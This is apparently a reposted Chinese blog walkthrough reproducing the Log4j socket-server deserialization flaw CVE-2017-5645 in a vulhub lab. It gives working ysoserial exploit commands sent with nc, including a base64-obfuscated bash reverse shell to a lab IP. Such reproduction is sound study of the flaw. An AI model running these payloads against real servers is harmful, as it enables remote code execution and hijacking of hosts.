Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

其他 2021-02-01 10:54:18 阅读次数: 0

漏洞概述

 

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

 

环境搭建

 

这里使用vulhub来搭建环境

https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
进入目录并启动环境

cd vulhub-master/log4j/CVE-2017-5645/

docker-compose up -d

环境启动后,将在4712端口开启一个TCPServer。

 

漏洞复现

 

我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.204.138 4712

进入容器

docker exec -it 69272f8d8ae8 /bin/bash

执行了命令

再试试反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.204.138 4712

修复建议

 

升级到安全版本

 

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/113351054
今日推荐
周排行
教你如何约女孩子的方式去理解(TCP三次握手与四次挥手)
android按压背景
【量化小讲堂-Python&Pandas系列10】如何判断一个策略的好坏?(附代码)
编程题:利用链表实现栈
盘点47条 Allegro 使用技巧,你都知道吗?
在VMware Workstation中安装CentOS
二叉树的实现
cmake安装jsoncpp
ReactNative开发城市列表页
最全前端学习资源
每日归档
更多
2025-03-20(0)
2025-03-19(0)
2025-03-18(0)
2025-03-17(0)
2025-03-16(0)
2025-03-15(0)
2025-03-14(0)
2025-03-13(0)
2025-03-12(0)
2025-03-11(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022